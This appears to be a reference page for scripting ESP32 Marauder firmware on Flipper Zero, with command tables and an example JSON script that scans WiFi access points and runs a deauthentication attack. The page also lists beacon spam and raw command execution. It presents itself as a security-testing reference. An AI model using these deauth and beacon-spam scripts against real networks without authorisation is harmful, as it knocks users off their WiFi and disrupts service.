cd
A comprehensive guide to scripting the ESP32 Marauder firmware for automated WiFi security testing with Flipper Zero.
Parameter | Values | Description |
---|---|---|
description |
String | Script purpose explanation |
repeat |
Integer (default: 1) | Total script repetitions |
enableLed |
true | false | LED feedback toggle |
savePcap |
true | false | Auto-save packet captures |
Command | Syntax | Description |
---|---|---|
scan |
{ "type": "ap" | "station", "timeout": seconds, "channel": 1-11 } |
WiFi device scanning |
select |
{ "type": "ap" | "station" | "ssid", "filter": "all | contains -f '{SSID}'...", "indexes": [0,1,2...] } |
Target selection/filtering |
deauth |
{ "timeout": seconds } |
Deauthentication attack |
sniff* |
{ "timeout": seconds, "forceDeauth": true|false, "channel": 1-11 } |
Packet capture commands |
beaconList |
{ "ssids": ["SSID1", "SSID2"], "generate": number, "timeout": seconds } |
Beacon frame spam |
exec |
{ "command": "CLI command" } |
Raw command execution |
delay |
{ "timeout": seconds } |
Stage pause |
Command | Description |
---|---|
listap -a |
List all access points |
attack -t deauth |
Start deauth attack |
clearlist -a |
Clear target lists |
// Example Marauder script { "meta": { "description": "Basic AP scan and deauth script", "repeat": 1, "enableLed": true, "savePcap": true }, "stages": [ { "scan": { "type": "ap", "timeout": 10, "channel": 1 } }, { "select": { "type": "ap", "filter": "all", "indexes": [0] } }, { "deauth": { "timeout": 30 } } ] }
{SSID}
or {MAC}
placeholders in filtersapps_data/marauder/